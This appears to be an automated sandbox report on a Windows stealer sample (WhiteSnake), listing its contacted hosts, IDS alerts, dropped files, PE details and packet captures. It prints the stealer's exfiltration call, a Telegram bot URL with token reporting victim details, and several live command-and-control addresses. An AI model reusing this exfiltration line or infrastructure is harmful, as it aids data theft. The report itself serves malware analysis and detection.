          https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403&text=%23CRYPTOMAINER%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E841618%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML | false | | high
                                                                                                high
                                                                                                http://101.126.19.171:80BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://51.159.4.50:8080/yrABY_user%40841618_report.wsrBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.ecosia.org/newtab/BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://51.159.4.50:8080/getBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://185.217.98.121:443BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://46.235.26.83:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://ac.ecosia.org/autocomplete?q=BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://116.202.101.219:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://46.235.26.83:80802aBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://38.60.191.38:80BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://67.230.176.97:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://147.28.185.29:80/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74%BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://46.235.26.83BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://132.145.17.167:9090BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://api.teleBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/wsdl/BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011855079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://127.0.0.1:18772/handleOpenWSR?r=BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://51.159.4.50:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://8.222.143.111:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://206.166.251.4:8080/yrABY_userBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://support.mozilla.orgBA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C4F000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011865182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://41.87.207.180:9090BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://api.telegram.orgBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://206.166.251.4:80802aBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
209.38.221.184 | unknown | United States | 7018 | ATT-INTERNET4US | true
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
206.166.251.4 | unknown | United States | 7816 | CTCUS | true
51.159.4.50 | unknown | France | 12876 | OnlineSASFR | true
46.235.26.83 | unknown | Germany | 33984 | SURFPLANET-ASDE | true
147.28.185.29 | unknown | United States | 3130 | RGNET-SEARGnetSeattleWestinEE | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1570929
Start date and time: 2024-12-08 13:01:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BA9qyj2c9G.exe (renamed because the original name is a hash value)
Original Sample Name: C9495B3A992EA3E2EF2788C7BA7ED840.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@26/3@2/7
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 19
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
07:01:54 | API Interceptor | 309x Sleep call for process: BA9qyj2c9G.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
209.38.221.184 | file.exe | malicious | WhiteSnake Stealer | 209.38.221.184:8080/yLWFd_user%40927537_report.wsr
208.95.112.1 | xooSsYaHN0.exe | malicious | Go Stealer, Skuld Stealer | ip-api.com/json
 | ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer | ip-api.com/json/
 | file.exe | malicious | Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc | ip-api.com/json/
 | file.exe | malicious | Discord Token Stealer, DotStealer | ip-api.com/json/
 | u7e3vb5dfk.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
 | a9YMw44iQq.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
 | ozgpPwVAu1.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
 | PG4w1WB9dE.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
 | a4BE6gJooT.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
 | grK0Oh8p4Z.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
149.154.167.220 | ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer |
 | file.exe | malicious | Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc |
 | INVOICES.bat.exe | malicious | Snake Keylogger, VIP Keylogger |
 | file.exe | malicious | Discord Token Stealer, DotStealer |
 | INQUIRY REQUEST AND PRICES_pdf.exe | malicious | GuLoader, MassLogger RAT |
 | RFQ Order list #2667747.exe | malicious | GuLoader, MassLogger RAT |
 | Payment Details Ref#577767.exe | malicious | GuLoader, MassLogger RAT |
 | IBAN Payment confirmation.exe | malicious | GuLoader, MassLogger RAT |
 | ozgpPwVAu1.exe | malicious | XWorm |
 | vUlh7stUHJ.exe | malicious | XWorm |
Associated Sample Name / URL | Detection | Threat Name | Context (grouped by Match)
Match: ip-api.com
  xooSsYaHN0.exe | malicious | Go Stealer, Skuld Stealer | 208.95.112.1
  ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer | 208.95.112.1
  file.exe | malicious | Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc | 208.95.112.1
  file.exe | malicious | Discord Token Stealer, DotStealer | 208.95.112.1
  u7e3vb5dfk.exe | malicious | XWorm | 208.95.112.1
  a9YMw44iQq.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
  ozgpPwVAu1.exe | malicious | XWorm | 208.95.112.1
  PG4w1WB9dE.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
  a4BE6gJooT.exe | malicious | XWorm | 208.95.112.1
  grK0Oh8p4Z.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
Match: api.telegram.org
  ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer | 149.154.167.220
  file.exe | malicious | Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc | 149.154.167.220
  INVOICES.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  file.exe | malicious | Discord Token Stealer, DotStealer | 149.154.167.220
  INQUIRY REQUEST AND PRICES_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  Bank Swift and SOA PRN00720031415453_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  RFQ Order list #2667747.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  Payment Details Ref#577767.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  IBAN Payment confirmation.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  ozgpPwVAu1.exe | malicious | XWorm | 149.154.167.220
Associated Sample Name / URL | Detection | Threat Name | Context (grouped by Match)
Match: ATT-INTERNET4 (US)
  meerkat.arm.elf | malicious | Mirai | 108.225.104.149
  meerkat.mpsl.elf | malicious | Mirai | 68.250.47.28
  meerkat.arm5.elf | malicious | Mirai | 68.122.208.101
  meerkat.x86.elf | malicious | Mirai | 75.33.176.164
  meerkat.mips.elf | malicious | Mirai | 172.190.16.7
  atthings.doc | malicious | Remcos | 216.9.226.100
  arm5.elf | malicious | Unknown | 107.214.238.161
  arm.elf | malicious | Unknown | 69.228.169.53
  jmhgeojeri.elf | malicious | Unknown | 65.64.43.40
  i686.elf | malicious | Unknown | 107.100.238.166
Match: TELEGRAM (RU)
  ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer | 149.154.167.220
  new.ini.ps1 | malicious | Unknown | 149.154.164.13
  file.exe | malicious | Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc | 149.154.167.220
  INVOICES.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  file.exe | malicious | Discord Token Stealer, DotStealer | 149.154.167.220
  INQUIRY REQUEST AND PRICES_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  RFQ Order list #2667747.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  Payment Details Ref#577767.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  IBAN Payment confirmation.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  ozgpPwVAu1.exe | malicious | XWorm | 149.154.167.220
Match: TUT-AS (US)
  xooSsYaHN0.exe | malicious | Go Stealer, Skuld Stealer | 208.95.112.1
  ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer | 208.95.112.1
  file.exe | malicious | Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc | 208.95.112.1
  file.exe | malicious | Discord Token Stealer, DotStealer | 208.95.112.1
  u7e3vb5dfk.exe | malicious | XWorm | 208.95.112.1
  a9YMw44iQq.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
  ozgpPwVAu1.exe | malicious | XWorm | 208.95.112.1
  PG4w1WB9dE.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
  a4BE6gJooT.exe | malicious | XWorm | 208.95.112.1
  grK0Oh8p4Z.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
Associated Sample Name / URL | Detection | Threat Name | Context (grouped by Match)
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  List of required items pdf.vbs | malicious | GuLoader | 149.154.167.220
  List of required items.vbs | malicious | Unknown | 149.154.167.220
  List of required items and services pdf.vbs | malicious | GuLoader | 149.154.167.220
  List of Required items and specifications.pdf.vbs | malicious | Unknown | 149.154.167.220
  8AE6w4efXi.exe | malicious | Unknown | 149.154.167.220
  ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer | 149.154.167.220
  YWFMFVCSun.bat | malicious | AsyncRAT, DcRat | 149.154.167.220
  8AE6w4efXi.exe | malicious | Unknown | 149.154.167.220
  7rTjhbfF6L.exe | malicious | Unknown | 149.154.167.220
  file.exe | malicious | LummaC Stealer | 149.154.167.220

No context
Process: C:\Users\user\Desktop\BA9qyj2c9G.exe
File Type: CSV text
Category: dropped
Size (bytes): 1498
Entropy (8bit): 5.364175471524945
Encrypted: false
SSDEEP: 24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
MD5: 1B713A2FD810C1C9A8F6F6BE36F406B1
SHA1: 0828576CB8B83C21F36AD29E327D845AB3574EBB
SHA-256: E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
SHA-512: D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

Process: C:\Users\user\Desktop\BA9qyj2c9G.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

Process: C:\Windows\System32\timeout.exe
File Type: ASCII text, with CRLF line terminators, with overstriking
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.41440934524794
Encrypted: false
SSDEEP: 3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5: 3DD7DD37C304E70A7316FE43B69F421F
SHA1: A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256: 4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512: 713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious: false
Preview: ..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):5.402766751415197
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            File name:BA9qyj2c9G.exe
                                                                                                                                                            File size:167'424 bytes
                                                                                                                                                            MD5:c9495b3a992ea3e2ef2788c7ba7ed840
                                                                                                                                                            SHA1:3d2e2ff99cd28f81a906d8d928ad7d42ff5226be
                                                                                                                                                            SHA256:3398ed7cffcc75371d831fda315805c714268c321c863f60c806ae73cfaae4cd
                                                                                                                                                            SHA512:a11e2b0424d7342bbddc9dd0541902128238281dd9aa620b81213d937a997f9da1c1d3954a05bd57383eb27cd3270d2a29b40a16893237c435fcfdb6344a1746
                                                                                                                                                            SSDEEP:3072:amqroacBJ41WGh6ta9Y9bvxWlI9fKp7KdD+QOi:amwoaCE9Y9bvCQfKkO
                                                                                                                                                            TLSH:0CF3F857F2414FB0D6AE8D76C1B21B3083A09E46CF51BB044A8AF1D52DD36D8EB126F6
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............."...0.............>.... ........@.. ....................................`................................
                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                            Entrypoint:0x42a13e
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the previous instruction, the decoding of two zero bytes, repeats 96 more times: zero padding after the jump through the IAT)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2a0ec          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2c000          0x720         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x28144       0x28200   997256af544bc91d3ba8c050998f8a82  False     0.40083479361370716  data       5.41759631536855     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x2c000          0x720         0x800     b89cb4996239d70ad7d78cd4379f0031  False     0.43701171875        data       4.609342591102905    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x2e000          0xc           0x200     9363c9f9c0a8c7b6c9747b69d0062671  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0x2c0a0  0x494  OpenPGP Secret Key                                                                                    0.48208191126279865
RT_MANIFEST  0x2c534  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-08T13:01:57.052726+0100 | 2045868 | ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) | 1 | 192.168.2.4 | 49731 | 209.38.221.184 | 8080 | TCP
2024-12-08T13:01:59.080774+0100 | 2045868 | ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) | 1 | 192.168.2.4 | 49732 | 46.235.26.83 | 8080 | TCP
2024-12-08T13:02:02.956808+0100 | 2045868 | ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) | 1 | 192.168.2.4 | 49733 | 147.28.185.29 | 80 | TCP
2024-12-08T13:02:04.960666+0100 | 2045868 | ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) | 1 | 192.168.2.4 | 49734 | 206.166.251.4 | 8080 | TCP
2024-12-08T13:02:26.972752+0100 | 2045868 | ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) | 1 | 192.168.2.4 | 49741 | 51.159.4.50 | 8080 | TCP
Network packet list (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
                                                                                                                                                            Dec 8, 2024 13:01:59.640554905 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.659475088 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.659528971 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.659615993 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.659662008 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.196607113 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.196634054 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.196732044 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:02:02.196943998 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:02:02.197566032 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.316907883 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.317524910 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.317601919 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.317780018 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.442015886 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.673619986 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.793531895 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793551922 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793561935 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793575048 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793585062 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793587923 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.793592930 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793601990 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793612957 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793622017 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793629885 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793663979 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.793690920 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.913448095 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.913466930 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.913479090 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.913506985 CET8049733147.28.185.29192.168.2.4
